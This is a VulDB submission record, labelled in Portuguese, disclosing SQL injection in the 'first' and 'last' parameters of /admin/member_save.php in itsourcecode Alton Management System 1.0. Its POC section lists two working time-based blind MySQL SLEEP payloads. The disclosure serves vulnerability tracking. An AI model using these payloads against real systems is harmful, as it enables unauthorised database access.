| Título | itsourcecode Alton Management System 1.0 member_save.php |
|---|
| Descrição | Log in as an administrator user, access the "/admin/member_save.php" page. This page can pass in the "last" and "first" parameters, both of which can lead to SQL injection vulnerabilities due to lax filtering.
-----------------POC------------------
Parameter: first (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: last=123&first=123' AND (SELECT 9651 FROM (SELECT(SLEEP(5)))LDVG) AND 'Zjoq'='Zjoq&contact=123&address=123
Parameter: last (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: last=123' AND (SELECT 9207 FROM (SELECT(SLEEP(5)))IyrR) AND 'YcaK'='YcaK&first=123&contact=123&address=123
----------------------------------------- |
|---|
| Fonte | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-4.md |
|---|
| Utilizador | Dee.Mirage (UID 71702) |
|---|
| Submissão | 27/07/2024 12h31 (há 2 anos) |
|---|
| Moderação | 30/07/2024 15h29 (3 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 273145 [itsourcecode Alton Management System 1.0 /admin/member_save.php last/first Injeção SQL] |
|---|
| Pontos | 20 |
|---|